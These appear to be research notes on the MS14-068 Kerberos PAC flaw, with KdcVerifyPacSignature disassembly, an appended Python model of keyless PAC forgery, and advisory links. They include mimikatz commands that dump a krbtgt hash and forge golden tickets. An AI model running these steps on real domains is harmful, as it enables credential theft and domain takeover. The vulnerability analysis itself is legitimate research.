63a89083 0f856c8c0000 jne KDCSVC!KdcVerifyPacSignature+0x72 (63a91cf5)
KDCSVC!KdcVerifyPacSignature+0x7d:
63a89089 53 push ebx
63a8908a 6a06 push 6
63a8908c 56 push esi
63a8908d e846ecffff call KDCSVC!PAC_Find (63a87cd8)
63a89092 8bd8 mov ebx,eax
63a89094 85db test ebx,ebx
63a89096 0f8488010000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x90:
63a8909c 8b4b04 mov ecx,dword ptr [ebx+4]
63a8909f 83f904 cmp ecx,4
63a890a2 0f827c010000 jb KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x9c:
63a890a8 8b4308 mov eax,dword ptr [ebx+8]
63a890ab 83c1fc add ecx,0FFFFFFFCh
63a890ae 8d5004 lea edx,[eax+4]
63a890b1 894598 mov dword ptr [ebp-68h],eax
63a890b4 8bc1 mov eax,ecx
63a890b6 c1e902 shr ecx,2
63a890b9 8bf2 mov esi,edx
63a890bb 8d7de8 lea edi,[ebp-18h]
63a890be f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a890c0 8bc8 mov ecx,eax
63a890c2 83e103 and ecx,3
63a890c5 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
63a890c7 8b4b04 mov ecx,dword ptr [ebx+4]
63a890ca 83e904 sub ecx,4
63a890cd 8bfa mov edi,edx
63a890cf 8bd1 mov edx,ecx
63a890d1 c1e902 shr ecx,2
63a890d4 33c0 xor eax,eax
63a890d6 f3ab rep stos dword ptr es:[edi]
63a890d8 6a00 push 0
63a890da 8bca mov ecx,edx
63a890dc 6a07 push 7
63a890de ff75b0 push dword ptr [ebp-50h]
63a890e1 83e103 and ecx,3
63a890e4 f3aa rep stos byte ptr es:[edi]
63a890e6 e8edebffff call KDCSVC!PAC_Find (63a87cd8)
63a890eb 85c0 test eax,eax
63a890ed 89459c mov dword ptr [ebp-64h],eax
63a890f0 0f842e010000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0xea:
63a890f6 8b5004 mov edx,dword ptr [eax+4]
63a890f9 83fa04 cmp edx,4
63a890fc 0f8222010000 jb KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0xf6:
63a89102 8b4808 mov ecx,dword ptr [eax+8]
63a89105 8d7104 lea esi,[ecx+4]
63a89108 894da0 mov dword ptr [ebp-60h],ecx
63a8910b 8d4afc lea ecx,[edx-4]
63a8910e 8bd1 mov edx,ecx
63a89110 c1e902 shr ecx,2
63a89113 ff7510 push dword ptr [ebp+10h]
63a89116 8975a4 mov dword ptr [ebp-5Ch],esi
63a89119 ff75b0 push dword ptr [ebp-50h]
63a8911c 8d7dc0 lea edi,[ebp-40h]
63a8911f f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a89121 8bca mov ecx,edx
63a89123 83e103 and ecx,3
63a89126 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
63a89128 8b4804 mov ecx,dword ptr [eax+4]
63a8912b 8b7da4 mov edi,dword ptr [ebp-5Ch]
63a8912e 83e904 sub ecx,4
63a89131 8bd1 mov edx,ecx
63a89133 c1e902 shr ecx,2
63a89136 33c0 xor eax,eax
63a89138 f3ab rep stos dword ptr es:[edi]
63a8913a 8bca mov ecx,edx
63a8913c 83e103 and ecx,3
63a8913f f3aa rep stos byte ptr es:[edi]
63a89141 e810e5ffff call KDCSVC!PAC_ReMarshal (63a87656)
63a89146 84c0 test al,al
63a89148 0f84d6000000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x142:
63a8914e 8d45b8 lea eax,[ebp-48h]
63a89151 50 push eax
63a89152 8b4598 mov eax,dword ptr [ebp-68h]
63a89155 ff30 push dword ptr [eax]
63a89157 e8538affff call KDCSVC!CDLocateCheckSum (63a81baf)
63a8915c 85c0 test eax,eax
63a8915e 0f8ce38b0000 jl KDCSVC!KdcVerifyPacSignature+0x224 (63a91d47)
KDCSVC!KdcVerifyPacSignature+0x158:
63a89164 8b55b8 mov edx,dword ptr [ebp-48h]
63a89167 837a0414 cmp dword ptr [edx+4],14h // DEBUG HERE IS THE ORIGINAL PATCH
63a8916b 0f87138c0000 ja KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x165:
63a89171 8b4a20 mov ecx,dword ptr [edx+20h]
63a89174 85c9 test ecx,ecx
63a89176 8d45b4 lea eax,[ebp-4Ch]
63a89179 50 push eax
63a8917a 6a11 push 11h
63a8917c 0f857e8b0000 jne KDCSVC!KdcVerifyPacSignature+0x172 (63a91d00)
KDCSVC!KdcVerifyPacSignature+0x183:
63a89182 8b45ac mov eax,dword ptr [ebp-54h]
63a89185 ff7004 push dword ptr [eax+4]
63a89188 ff7008 push dword ptr [eax+8]
63a8918b ff521c call dword ptr [edx+1Ch]
KDCSVC!KdcVerifyPacSignature+0x18f:
63a8918e 85c0 test eax,eax
63a89190 0f8cee8b0000 jl KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x197:
63a89196 ff75b0 push dword ptr [ebp-50h]
63a89199 8b45b8 mov eax,dword ptr [ebp-48h]
63a8919c ff7510 push dword ptr [ebp+10h]
63a8919f ff75b4 push dword ptr [ebp-4Ch]
63a891a2 ff5010 call dword ptr [eax+10h]
63a891a5 8d45d4 lea eax,[ebp-2Ch]
63a891a8 50 push eax
63a891a9 ff75b4 push dword ptr [ebp-4Ch]
63a891ac 8b45b8 mov eax,dword ptr [ebp-48h]
63a891af ff5014 call dword ptr [eax+14h]
63a891b2 8d45b4 lea eax,[ebp-4Ch]
63a891b5 50 push eax
63a891b6 8b45b8 mov eax,dword ptr [ebp-48h]
63a891b9 ff5018 call dword ptr [eax+18h]
63a891bc 8b45b8 mov eax,dword ptr [ebp-48h]
63a891bf 8b4804 mov ecx,dword ptr [eax+4]
63a891c2 8b4304 mov eax,dword ptr [ebx+4]
63a891c5 83e804 sub eax,4
63a891c8 3bc8 cmp ecx,eax
63a891ca 754e jne KDCSVC!KdcVerifyPacSignature+0x2ba (63a8921a)
KDCSVC!KdcVerifyPacSignature+0x1d1:
63a891cc 8d7de8 lea edi,[ebp-18h]
63a891cf 8d75d4 lea esi,[ebp-2Ch]
63a891d2 33c0 xor eax,eax
63a891d4 f3a6 repe cmps byte ptr [esi],byte ptr es:[edi]
63a891d6 7542 jne KDCSVC!KdcVerifyPacSignature+0x2ba (63a8921a)
KDCSVC!KdcVerifyPacSignature+0x1e1:
63a891d8 8b45a8 mov eax,dword ptr [ebp-58h]
63a891db 817820f6010000 cmp dword ptr [eax+20h],1F6h
63a891e2 0f852c8b0000 jne KDCSVC!KdcVerifyPacSignature+0x1f1 (63a91d14)
KDCSVC!KdcVerifyPacSignature+0x2ee:
63a891e8 837dbc29 cmp dword ptr [ebp-44h],29h
63a891ec 0f841e8c0000 je KDCSVC!KdcVerifyPacSignature+0x2f4 (63a91e10)
KDCSVC!KdcVerifyPacSignature+0x340:
63a891f2 837db400 cmp dword ptr [ebp-4Ch],0
63a891f6 5f pop edi
63a891f7 5e pop esi
63a891f8 5b pop ebx
63a891f9 0f85668c0000 jne KDCSVC!KdcVerifyPacSignature+0x349 (63a91e65)
KDCSVC!KdcVerifyPacSignature+0x357:
63a891ff 8d8558ffffff lea eax,[ebp-0A8h]
63a89205 50 push eax
63a89206 e8498cffff call KDCSVC!FreeTicketInfo (63a81e54)
63a8920b 8b4dfc mov ecx,dword ptr [ebp-4]
63a8920e 8b45bc mov eax,dword ptr [ebp-44h]
63a89211 e83f89ffff call KDCSVC!__security_check_cookie (63a81b55)
63a89216 c9 leave
63a89217 c21000 ret 10h
KDCSVC!KdcVerifyPacSignature+0x2ba:
63a8921a 683092a863 push offset KDCSVC!`string' (63a89230)
63a8921f e9bb8b0000 jmp KDCSVC!KdcVerifyPacSignature+0x2bf (63a91ddf)
KDCSVC!KdcVerifyPacSignature+0x2d1:
63a89224 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a8922b e9c18b0000 jmp KDCSVC!KdcVerifyPacSignature+0x2d8 (63a91df1)
KDCSVC!KdcVerifyPacSignature+0x72:
63a91cf5 50 push eax
63a91cf6 e884120100 call KDCSVC!KerbMapKerbError (63aa2f7f)
63a91cfb e9f1000000 jmp KDCSVC!KdcVerifyPacSignature+0x2d8 (63a91df1)
KDCSVC!KdcVerifyPacSignature+0x172:
63a91d00 8d45e8 lea eax,[ebp-18h]
63a91d03 50 push eax
63a91d04 8b45ac mov eax,dword ptr [ebp-54h]
63a91d07 ff7004 push dword ptr [eax+4]
63a91d0a ff7008 push dword ptr [eax+8]
63a91d0d ffd1 call ecx
63a91d0f e97a74ffff jmp KDCSVC!KdcVerifyPacSignature+0x18f (63a8918e)
KDCSVC!KdcVerifyPacSignature+0x1f1:
63a91d14 f6401c40 test byte ptr [eax+1Ch],40h
63a91d18 0f85ca74ffff jne KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x1fb:
63a91d1e 687bffffff push 0FFFFFF7Bh
63a91d23 ff7584 push dword ptr [ebp-7Ch]
63a91d26 e848fefeff call KDCSVC!KerbGetKeyFromList (63a81b73)
63a91d2b 8bf0 mov esi,eax
63a91d2d 85f6 test esi,esi
63a91d2f 0f84b374ffff je KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x212:
63a91d35 8d45b8 lea eax,[ebp-48h]
63a91d38 50 push eax
63a91d39 8b45a0 mov eax,dword ptr [ebp-60h]
63a91d3c ff30 push dword ptr [eax]
63a91d3e e86cfefeff call KDCSVC!CDLocateCheckSum (63a81baf)
63a91d43 85c0 test eax,eax
63a91d45 7d0c jge KDCSVC!KdcVerifyPacSignature+0x230 (63a91d53)
KDCSVC!KdcVerifyPacSignature+0x224:
63a91d47 c745bc0f000000 mov dword ptr [ebp-44h],0Fh
63a91d4e e99f74ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x230:
63a91d53 8b45b8 mov eax,dword ptr [ebp-48h]
63a91d56 8b4820 mov ecx,dword ptr [eax+20h]
63a91d59 85c9 test ecx,ecx
63a91d5b 7414 je KDCSVC!KdcVerifyPacSignature+0x24e (63a91d71)
KDCSVC!KdcVerifyPacSignature+0x23a:
63a91d5d 8d45b4 lea eax,[ebp-4Ch]
63a91d60 50 push eax
63a91d61 6a11 push 11h
63a91d63 8d45c0 lea eax,[ebp-40h]
63a91d66 50 push eax
63a91d67 ff7604 push dword ptr [esi+4]
63a91d6a ff7608 push dword ptr [esi+8]
63a91d6d ffd1 call ecx
63a91d6f eb0f jmp KDCSVC!KdcVerifyPacSignature+0x25d (63a91d80)
KDCSVC!KdcVerifyPacSignature+0x24e:
63a91d71 8d4db4 lea ecx,[ebp-4Ch]
63a91d74 51 push ecx
63a91d75 6a11 push 11h
63a91d77 ff7604 push dword ptr [esi+4]
63a91d7a ff7608 push dword ptr [esi+8]
63a91d7d ff501c call dword ptr [eax+1Ch]
KDCSVC!KdcVerifyPacSignature+0x25d:
63a91d80 85c0 test eax,eax
63a91d82 7d0c jge KDCSVC!KdcVerifyPacSignature+0x26d (63a91d90)
KDCSVC!KdcVerifyPacSignature+0x261:
63a91d84 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a91d8b e96274ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x26d:
63a91d90 8d45e8 lea eax,[ebp-18h]
63a91d93 50 push eax
63a91d94 8b45b8 mov eax,dword ptr [ebp-48h]
63a91d97 ff7004 push dword ptr [eax+4]
63a91d9a ff75b4 push dword ptr [ebp-4Ch]
63a91d9d ff5010 call dword ptr [eax+10h]
63a91da0 8d45d4 lea eax,[ebp-2Ch]
63a91da3 50 push eax
63a91da4 ff75b4 push dword ptr [ebp-4Ch]
63a91da7 8b45b8 mov eax,dword ptr [ebp-48h]
63a91daa ff5014 call dword ptr [eax+14h]
63a91dad 8d45b4 lea eax,[ebp-4Ch]
63a91db0 50 push eax
63a91db1 8b45b8 mov eax,dword ptr [ebp-48h]
63a91db4 ff5018 call dword ptr [eax+18h]
63a91db7 8b45b8 mov eax,dword ptr [ebp-48h]
63a91dba 8b4804 mov ecx,dword ptr [eax+4]
63a91dbd 8b459c mov eax,dword ptr [ebp-64h]
63a91dc0 8b4004 mov eax,dword ptr [eax+4]
63a91dc3 83e804 sub eax,4
63a91dc6 3bc8 cmp ecx,eax
63a91dc8 7510 jne KDCSVC!KdcVerifyPacSignature+0x2b3 (63a91dda)
KDCSVC!KdcVerifyPacSignature+0x2a7:
63a91dca 8d7dc0 lea edi,[ebp-40h]
63a91dcd 8d75d4 lea esi,[ebp-2Ch]
63a91dd0 33c0 xor eax,eax
63a91dd2 f3a6 repe cmps byte ptr [esi],byte ptr es:[edi]
63a91dd4 0f840e74ffff je KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2b3:
63a91dda 687c1ea963 push offset KDCSVC!`string' (63a91e7c)
KDCSVC!KdcVerifyPacSignature+0x2bf:
63a91ddf 6a01 push 1
63a91de1 e89d1effff call KDCSVC!KDCDebugPrint (63a83c83)
63a91de6 59 pop ecx
63a91de7 59 pop ecx
63a91de8 c745bc29000000 mov dword ptr [ebp-44h],29h
63a91def eb1f jmp KDCSVC!KdcVerifyPacSignature+0x2f4 (63a91e10)
KDCSVC!KdcVerifyPacSignature+0x2d8:
63a91df1 ff7510 push dword ptr [ebp+10h]
63a91df4 ff75b0 push dword ptr [ebp-50h]
63a91df7 e85a58ffff call KDCSVC!PAC_ReMarshal (63a87656)
63a91dfc 84c0 test al,al
63a91dfe 0f85e473ffff jne KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2e7:
63a91e04 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a91e0b e9d873ffff jmp KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2f4:
63a91e10 8b75a8 mov esi,dword ptr [ebp-58h]
63a91e13 0fb706 movzx eax,word ptr [esi]
63a91e16 40 inc eax
63a91e17 40 inc eax
63a91e18 50 push eax
63a91e19 e84301ffff call KDCSVC!MIDL_user_allocate (63a81f61)
63a91e1e 8bd8 mov ebx,eax
63a91e20 85db test ebx,ebx
63a91e22 7416 je KDCSVC!KdcVerifyPacSignature+0x31e (63a91e3a)
KDCSVC!KdcVerifyPacSignature+0x308:
63a91e24 0fb70e movzx ecx,word ptr [esi]
63a91e27 8b7604 mov esi,dword ptr [esi+4]
63a91e2a 8bc1 mov eax,ecx
63a91e2c c1e902 shr ecx,2
63a91e2f 8bfb mov edi,ebx
63a91e31 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a91e33 8bc8 mov ecx,eax
63a91e35 83e103 and ecx,3
63a91e38 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
KDCSVC!KdcVerifyPacSignature+0x31e:
63a91e3a 53 push ebx
63a91e3b 6a01 push 1
63a91e3d 8d45bc lea eax,[ebp-44h]
63a91e40 50 push eax
63a91e41 6a04 push 4
63a91e43 68120000c0 push 0C0000012h
63a91e48 6a01 push 1
63a91e4a e8aa550000 call KDCSVC!ReportServiceEvent (63a973f9)
63a91e4f 83c418 add esp,18h
63a91e52 85db test ebx,ebx
63a91e54 0f849873ffff je KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x33a:
63a91e5a 53 push ebx
63a91e5b e84700ffff call KDCSVC!MIDL_user_free (63a81ea7)
63a91e60 e98d73ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x349:
63a91e65 8b45b8 mov eax,dword ptr [ebp-48h]
63a91e68 85c0 test eax,eax
63a91e6a 0f848f73ffff je KDCSVC!KdcVerifyPacSignature+0x357 (63a891ff)
KDCSVC!KdcVerifyPacSignature+0x350:
63a91e70 8d4db4 lea ecx,[ebp-4Ch]
63a91e73 51 push ecx
63a91e74 ff5018 call dword ptr [eax+18h]
63a91e77 e98373ffff jmp KDCSVC!KdcVerifyPacSignature+0x357 (63a891ff)
[*] Golden attack:
(1) From the AD:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : SMALLBUSINESS / S-1-5-21-1053798420-2132824579-2427655443
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 6375ac5dba2a03b83002ba6e6e96c547 <-- it is what we need!
* WDigest
01 bf816f365e0fac18a06269b62fdec3cd
02 60bcd5b31db779bee316ead3f9f2bdc5
03 052450bedad3c62b6c7ac2e0518cced6
04 bf816f365e0fac18a06269b62fdec3cd
05 60bcd5b31db779bee316ead3f9f2bdc5
06 6b46611bab1bfc37642831eb4c378a3c
07 bf816f365e0fac18a06269b62fdec3cd
08 36d36b240d95960b3280c17f3dbdd4ef
09 36d36b240d95960b3280c17f3dbdd4ef
10 7700dc3feea8de94dfe42fadd189b562
11 cf5dd5487a5bf52ddb92114e11b35258
12 36d36b240d95960b3280c17f3dbdd4ef
13 85c06a5e70ebb4ea9ea94ec741afc3f4
14 cf5dd5487a5bf52ddb92114e11b35258
15 9e215c82295f151f068a61dcfc25df79
16 9e215c82295f151f068a61dcfc25df79
17 2bbe05a083dd57a8db17231355da9ef5
18 d66e91d4fcd16a0e98c16bec14676e06
19 63381fd3a292e6d6c89ced1f6b14e580
20 111ef3e25e5237fea3190ae4924c981c
21 68c6af34d37db9eeed0e32540f60fe3a
22 68c6af34d37db9eeed0e32540f60fe3a
23 207d5247bd7dac0b5100035d0d6ffb6d
24 5db537f6bfc59059821180dc06e18696
25 5db537f6bfc59059821180dc06e18696
26 f8247c1ccff30ab886e699e401c98241
27 03ddbc3697b4eac454c5c8a5746c4165
28 98b8c45c30f3eb9727de422e2ff11429
29 72fed805b12f04991c8326e8664f909f
* Kerberos
Default Salt : SMALLBUSINESS.LOCALkrbtgt
Credentials
des_cbc_md5 : 497f68d05db65be0
des_cbc_crc : 497f68d05db65be0
6375ac5dba2a03b83002ba6e6e96c547
(2) From the machine we’re attacking (user juan):
kerberos::golden /domain:SMALLBUSINESS.local /sid:S-1-5-21-1053798420-2132824579-2427655443 /user:juan /id:1116 /groups:513,500 /krbtgt:6375ac5dba2a03b83002ba6e6e96c547
That’s all.
I think the idea is similar to the golden attack, but hopefully we don't need the
krbtgt key anymore. Even though I can modify the SignatureType and create RC4-encrypted
tickets with different signatures, the key is still needed to encrypt a ticket.
So, by modifying mimikatz I can easily create different "malformed tickets". Even
though I can switch the signature mechanism, I still need the krbtgt hash to encrypt the
TGT.
(Hash for DES)
kerberos::golden /domain:SMALLBUSINESS.local /sid:S-1-5-21-1053798420-2132824579-2427655443 /user:juan /id:1116 /groups:513,500 /krbtgt:497f68d05db65be0
To check the signature used by ValidationInfo I'm using the following breakpoint:
bp 63a89167 "r edx; dd edx L1; kb 4; g"
Assessed Attacker Value: 0
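As an added example (editor's code, not part of the analyst notes above and not taken from mimikatz or any exploit), the following Python models the check that the KdcVerifyPacSignature disassembly in the notes performs: find PAC buffers of type 6 (server checksum) and 7 (KDC checksum), recompute the server checksum over the PAC with both Signature fields zeroed and the KDC checksum over the server signature bytes, using whatever SignatureType the PAC itself declares. That is the point of both the golden-ticket discussion and the "different signatures" experiments: with a keyed checksum type the forger needs the krbtgt key, but if the KDC honours an unkeyed type such as RSA-MD5 no key is needed at all. Assumptions: a minimal three-buffer PAC, a constructed byte string standing in for the NDR-encoded KERB_VALIDATION_INFO, the lab krbtgt NT hash from the lsadump output as the RC4-HMAC key, and `patched=True` modelling the MS14-068 fix as "reject unkeyed checksum types", which is the published description of the fix rather than something read from this disassembly.

```python
import hashlib
import hmac
import struct

# PAC buffer types (MS-PAC 2.4); the disassembly calls PAC_Find(pac, 6, ...) and PAC_Find(pac, 7, ...)
PAC_LOGON_INFO = 1        # KERB_VALIDATION_INFO (NDR-encoded in a real PAC)
PAC_SERVER_CHECKSUM = 6
PAC_PRIVSVR_CHECKSUM = 7  # KDC (krbtgt) checksum

# Checksum types: KERB_CHECKSUM_HMAC_MD5 is keyed, RSA-MD5 is not.
KERB_CHECKSUM_HMAC_MD5 = 0xFFFFFF76  # -138
KERB_CHECKSUM_RSA_MD5 = 7
KEYED_CHECKSUMS = {KERB_CHECKSUM_HMAC_MD5, 15, 16}  # plus HMAC-SHA1-96 AES128/AES256
KERB_NON_KERB_CKSUM_SALT = 17  # key usage: the "push 11h" before the checksum init
MAX_SIGNATURE_LEN = 0x14       # the "cmp dword ptr [edx+4],14h" size check

# Lab krbtgt NT hash from the lsadump output above; it is the RC4-HMAC key.
KRBTGT_KEY = bytes.fromhex("6375ac5dba2a03b83002ba6e6e96c547")
# Constructed stand-ins for the NDR-encoded KERB_VALIDATION_INFO (not a real encoding).
LOGON_INFO = b"KERB_VALIDATION_INFO:user=juan;rid=1116;groups=513"
FORGED_INFO = b"KERB_VALIDATION_INFO:user=juan;rid=1116;groups=513,512"


def kerb_checksum(ctype, key, data):
    """Kerberos checksum of type ctype over data; unkeyed types ignore key."""
    if ctype == KERB_CHECKSUM_HMAC_MD5:
        # RFC 4757 section 4: Ksign = HMAC-MD5(K, "signaturekey\0");
        # checksum = HMAC-MD5(Ksign, MD5(usage_le32 || data))
        ksign = hmac.new(key, b"signaturekey\0", hashlib.md5).digest()
        inner = hashlib.md5(struct.pack("<I", KERB_NON_KERB_CKSUM_SALT) + data).digest()
        return hmac.new(ksign, inner, hashlib.md5).digest()
    if ctype == KERB_CHECKSUM_RSA_MD5:
        return hashlib.md5(data).digest()  # no key involved at all
    raise ValueError("unsupported checksum type %#x" % ctype)


def pac_find(pac, wanted):
    """PAC_Find equivalent: (offset, data) of the first PAC_INFO_BUFFER of type wanted."""
    cbuffers, _version = struct.unpack_from("<II", pac, 0)
    for i in range(cbuffers):
        btype, size, offset = struct.unpack_from("<IIQ", pac, 8 + 16 * i)
        if btype == wanted:
            return offset, pac[offset:offset + size]
    return None


def build_pac(logon_info, srv_type, kdc_type, srv_key=None, kdc_key=None):
    """Marshal PACTYPE + three PAC_INFO_BUFFERs and fill in both signatures."""
    entries = [
        (PAC_LOGON_INFO, logon_info),
        (PAC_SERVER_CHECKSUM, struct.pack("<I", srv_type) + b"\0" * 16),
        (PAC_PRIVSVR_CHECKSUM, struct.pack("<I", kdc_type) + b"\0" * 16),
    ]
    header = struct.pack("<II", len(entries), 0)
    body, offsets, cursor = b"", [], 8 + 16 * len(entries)
    for _btype, data in entries:
        offsets.append(cursor)
        padded = data + b"\0" * (-len(data) % 8)  # buffers are 8-byte aligned
        body += padded
        cursor += len(padded)
    for (btype, data), off in zip(entries, offsets):
        header += struct.pack("<IIQ", btype, len(data), off)
    pac = bytearray(header + body)
    # Server signature: whole PAC with both Signature fields zeroed (they still are).
    srv_sig = kerb_checksum(srv_type, srv_key, bytes(pac))
    pac[offsets[1] + 4:offsets[1] + 4 + len(srv_sig)] = srv_sig
    # KDC signature: over the server signature bytes only (MS-PAC 2.8.2).
    kdc_sig = kerb_checksum(kdc_type, kdc_key, srv_sig)
    pac[offsets[2] + 4:offsets[2] + 4 + len(kdc_sig)] = kdc_sig
    return bytes(pac)


def verify_pac(pac, srv_key, kdc_key, patched):
    """Mirror KdcVerifyPacSignature for a TGT's PAC (both keys are krbtgt's).

    The checksum type comes from the attacker-controlled SignatureType field.
    patched=False: any type whose output fits in 20 bytes is honoured, so an
    unkeyed RSA-MD5 signature verifies with no key. patched=True: keyed only."""
    srv, kdc = pac_find(pac, PAC_SERVER_CHECKSUM), pac_find(pac, PAC_PRIVSVR_CHECKSUM)
    if srv is None or kdc is None:
        return False
    (srv_off, srv_buf), (kdc_off, kdc_buf) = srv, kdc
    srv_type, kdc_type = struct.unpack_from("<I", srv_buf)[0], struct.unpack_from("<I", kdc_buf)[0]
    srv_sig, kdc_sig = srv_buf[4:], kdc_buf[4:]
    if len(srv_sig) > MAX_SIGNATURE_LEN or len(kdc_sig) > MAX_SIGNATURE_LEN:
        return False
    if patched and not (srv_type in KEYED_CHECKSUMS and kdc_type in KEYED_CHECKSUMS):
        return False
    zeroed = bytearray(pac)
    zeroed[srv_off + 4:srv_off + 4 + len(srv_sig)] = b"\0" * len(srv_sig)
    zeroed[kdc_off + 4:kdc_off + 4 + len(kdc_sig)] = b"\0" * len(kdc_sig)
    try:
        if not hmac.compare_digest(kerb_checksum(srv_type, srv_key, bytes(zeroed)), srv_sig):
            return False
        return hmac.compare_digest(kerb_checksum(kdc_type, kdc_key, srv_sig), kdc_sig)
    except ValueError:  # CDLocateCheckSum failed: unknown checksum type
        return False


def demo():
    """Verification results for a genuine TGT PAC and a keyless forgery."""
    genuine = build_pac(LOGON_INFO, KERB_CHECKSUM_HMAC_MD5, KERB_CHECKSUM_HMAC_MD5,
                        KRBTGT_KEY, KRBTGT_KEY)
    # The forger has no krbtgt key: both SignatureTypes switched to unkeyed RSA-MD5.
    forged = build_pac(FORGED_INFO, KERB_CHECKSUM_RSA_MD5, KERB_CHECKSUM_RSA_MD5)
    return {
        "genuine_unpatched": verify_pac(genuine, KRBTGT_KEY, KRBTGT_KEY, patched=False),
        "genuine_patched": verify_pac(genuine, KRBTGT_KEY, KRBTGT_KEY, patched=True),
        "forged_unpatched": verify_pac(forged, KRBTGT_KEY, KRBTGT_KEY, patched=False),
        "forged_patched": verify_pac(forged, KRBTGT_KEY, KRBTGT_KEY, patched=True),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print("%-18s %s" % (name, "ACCEPTED" if ok else "rejected"))
```

The unpatched check accepts the forged PAC because the KDC trusts the PAC's own SignatureType and the chosen type never consults the krbtgt key; the patched check rejects it before any checksum is computed, while a golden ticket (keyed HMAC-MD5 signatures made with the real krbtgt hash) still verifies on both, which is why that attack survives the fix.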
blog.beyondtrust.com/a-quick-look-at-ms14-068
blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
marc.info/?l=bugtraq&m=142350249315918&w=2
secunia.com/advisories/62556
www.roguelynn.com/words/explain-like-im-5-kerberos
www.securitytracker.com/id/1031237
www.us-cert.gov/ncas/alerts/TA14-323A
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324
docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-068
www.securityfocus.com/bid/70958